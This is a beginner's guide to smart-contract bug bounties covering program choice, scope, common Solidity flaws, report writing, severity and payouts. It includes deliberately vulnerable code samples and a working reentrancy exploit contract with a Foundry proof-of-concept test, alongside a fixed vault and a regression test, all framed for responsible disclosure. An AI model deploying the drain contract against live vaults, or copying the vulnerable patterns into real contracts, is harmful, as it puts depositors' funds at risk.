# Your First Bug Bounty Submission: A Practical Guide
Millions have been paid out in smart contract bug bounties, but submitting for the first time can be intimidating.
Here is a step-by-step guide, from choosing a program to getting paid.
## 1. Choose a Program
### Popular Platforms
| Platform | Focus | Payout Speed |
|----------|-------|--------------|
| Immunefi | DeFi protocols | 1-3 months |
| Code4rena | Competitive audits | 2-4 weeks |
| Sherlock | Contest-based | ~3 weeks |
| HackerOne | Mixed (Web2+Web3) | Variable |
### Criteria
For beginners:
- Small scope (<5 contracts)
- Good documentation
- Previous reports are public (for learning)
Example: ERC20 token contracts, simple staking, NFT mints.
## 2. Read the Scope
Critical: do not submit out-of-scope bugs.
In Scope:
✅ Core contracts (Vault.sol, Strategy.sol)
✅ Access control bugs
✅ Economic exploits (price manipulation)
Out of Scope:
❌ Frontend bugs
❌ Known issues (see GitHub issues)
❌ Gas optimizations (unless Critical impact)
## 3. Find a Bug
### Common Patterns
A) Reentrancy
```solidity
// Vulnerable
function withdraw(uint amount) external {
    uint balance = balances[msg.sender];
    require(balance >= amount);
    // State update AFTER external call ❌
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
    balances[msg.sender] -= amount; // Too late!
}
```
B) Access Control
```solidity
// Vulnerable
function setOwner(address newOwner) external {
    // Missing onlyOwner modifier ❌
    owner = newOwner;
}
```
C) Integer Overflow (pre-0.8.0)
```solidity
// Vulnerable
function mint(uint amount) external {
    totalSupply += amount; // Can overflow ❌
}
```
D) Price Manipulation
```solidity
// Vulnerable oracle
function getPrice() public view returns (uint) {
    uint reserve0 = token0.balanceOf(address(this));
    uint reserve1 = token1.balanceOf(address(this));
    return reserve1 * 1e18 / reserve0; // Flash loan attackable ❌
}
```
## 4. Write the Report
### Template
```markdown
# [Severity] Title: Brief Impact

## Summary
1-2 sentences: what breaks, and how?

## Vulnerability Details
- Explain the root cause
- Code snippet (10-20 lines)
- Mention line numbers

## Impact
- Who loses money?
- How much?
- Likelihood (High/Medium/Low)

## Proof of Concept
Foundry test or step-by-step exploit flow

## Recommendation
Suggest the fix code
```
### Real Example
````markdown
# [High] Reentrancy in withdraw() allows draining vault

## Summary
The withdraw() function updates the user balance AFTER the external call, allowing reentrancy to drain the vault.

## Vulnerability Details
File: Vault.sol, lines 45-52

```solidity
function withdraw(uint amount) external {
    require(balances[msg.sender] >= amount);
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
    balances[msg.sender] -= amount; // ❌ State update after call
}
```

## Impact
- Attacker can drain entire vault balance
- All depositor funds at risk
- Likelihood: High (trivial exploit)

## Proof of Concept

```solidity
contract Exploit {
    Vault vault;
    uint count;

    function attack() external payable {
        vault.deposit{value: 1 ether}();
        vault.withdraw(1 ether);
    }

    receive() external payable {
        if (count < 10 && address(vault).balance > 0) {
            count++;
            vault.withdraw(1 ether);
        }
    }
}
```

Run:

```bash
forge test --match-test testReentrancy -vvv
```

Output: Vault drained ✅

## Recommendation
Move the state update BEFORE the external call:

```solidity
function withdraw(uint amount) external {
    require(balances[msg.sender] >= amount);
    balances[msg.sender] -= amount; // ✅ Update first
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
}
```

Or use ReentrancyGuard.
````
## 5. Severity Triage
### Rubric
| Severity | Criteria | Payout Range |
|----------|----------|--------------|
| Critical | Funds directly drained | $50k - $1M+ |
| High | Funds at risk, conditions needed | $10k - $100k |
| Medium | Temporary DoS, minor fund risk | $1k - $10k |
| Low | Informational, unlikely scenario | $0 - $1k |
Be honest: over-inflating severity means fast rejection.
## 6. PoC Requirements
### Foundry Test (Preferred)
```solidity
// test/Exploit.t.sol
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../src/Vault.sol";
// Attacker is the re-entering contract from the PoC in section 4 (assumed to be
// defined in this file or imported alongside Vault).

contract ExploitTest is Test {
    Vault vault;
    Attacker attacker;

    function setUp() public {
        vault = new Vault();
        attacker = new Attacker(vault);
        // Setup initial state
        vault.deposit{value: 10 ether}();
    }

    function testExploit() public {
        uint balanceBefore = address(attacker).balance;
        attacker.attack{value: 1 ether}();
        uint balanceAfter = address(attacker).balance;
        // Attacker profit > initial stake
        assertGt(balanceAfter, balanceBefore + 1 ether);
    }
}
```
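The PoC test above proves the bug; a program will also want to see that the fix recommended in the sample report (section 4) actually closes it. The following regression test is an added example written for this guide, not code from any program's repository: it deploys a minimal hardened vault (assumed layout, checks-effects-interactions applied), replays the same re-entering call pattern, and asserts that the nested withdraw is rejected and depositor funds stay untouched. The names `SafeVault`, `Reenterer` and the file path are assumptions.

```solidity
// test/SafeVault.t.sol (added example; contract and file names are assumptions)
pragma solidity ^0.8.0;
import "forge-std/Test.sol";

// Hardened vault: balance is reduced BEFORE the external call (checks-effects-interactions)
contract SafeVault {
    mapping(address => uint256) public balances;
    function deposit() external payable { balances[msg.sender] += msg.value; }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;                   // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction last
        require(ok, "transfer failed");
    }
}

// Same re-entering caller shape as the PoC above, but it records rejected nested calls
contract Reenterer {
    SafeVault public vault;
    uint256 public stake;
    uint256 public blocked;
    constructor(SafeVault _vault) { vault = _vault; }

    function attack() external payable {
        stake = msg.value;
        vault.deposit{value: stake}();
        vault.withdraw(stake);
    }

    receive() external payable {
        // Nested withdraw must revert: this contract's balance is already zero
        try vault.withdraw(stake) {} catch { blocked++; }
    }
}

contract SafeVaultTest is Test {
    SafeVault vault;
    Reenterer reenterer;
    function setUp() public {
        vault = new SafeVault();
        reenterer = new Reenterer(vault);
        vault.deposit{value: 10 ether}(); // constructed: other depositors' funds
    }

    function testReentrancyBlocked() public {
        reenterer.attack{value: 1 ether}();
        assertEq(reenterer.blocked(), 1);              // nested call was rejected
        assertEq(address(vault).balance, 10 ether);    // depositors untouched
        assertEq(address(reenterer).balance, 1 ether); // only its own stake came back
    }
}
```

Run it with `forge test --match-test testReentrancyBlocked -vvv`; the same test run against the vulnerable `withdraw()` ordering fails on the vault-balance assertion, which is the side-by-side evidence triagers look for.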
### Or Step-by-Step
If you don't have a Foundry test:
## 7. Communication
### Do's
✅ Professional tone
✅ Clear English (broken English is OK, but it must be readable)
✅ Respond within 48 hours
✅ Provide extra details if asked
### Don'ts
❌ Public disclosure before the fix (you will be blacklisted)
❌ Aggressive tone ("This is Critical! Pay me now!")
❌ Spam multiple programs with same bug
## 8. Payout Expectations
### Timeline
Submit → Triage (1-7 days) → Fix (1-4 weeks) → Payout (2-8 weeks)
### Payment
- Immunefi: USDC/USDT/DAI
- Code4rena: USDC
- Sherlock: USDC
## 9. Rejection Reasons
### Common
- Duplicate: already reported
- Out of scope: frontend bug submitted
- Invalid: PoC doesn't work
- Low severity: overestimated impact
- Known issue: acknowledged in docs
### Handling Rejection
- Ask for feedback
- Learn from it
- Move on to the next program
## 10. First Submission Checklist
- [ ] Is the program in scope?
- [ ] Have you read previous reports?
- [ ] Is the PoC working (local test)?
- [ ] Is the severity justified?
- [ ] Grammar checked (Grammarly)?
- [ ] Are the code snippets readable?
- [ ] Is the impact clearly explained?
## Real Success Story
```
Researcher: Anonymous
Bug: Reentrancy in DeFi vault
Severity: Critical
Payout: $125,000 USDC
Timeline: 6 weeks (submission → payment)
```
Lesson: simple bugs, well explained, get rewarded.
## Conclusion
Bug bounties can seem intimidating, but with a systematic approach they are accessible.
Start with small programs, write good reports, and be patient.
After your first bounty your confidence will grow, and it can become a passive income stream.
Happy hunting! 🎯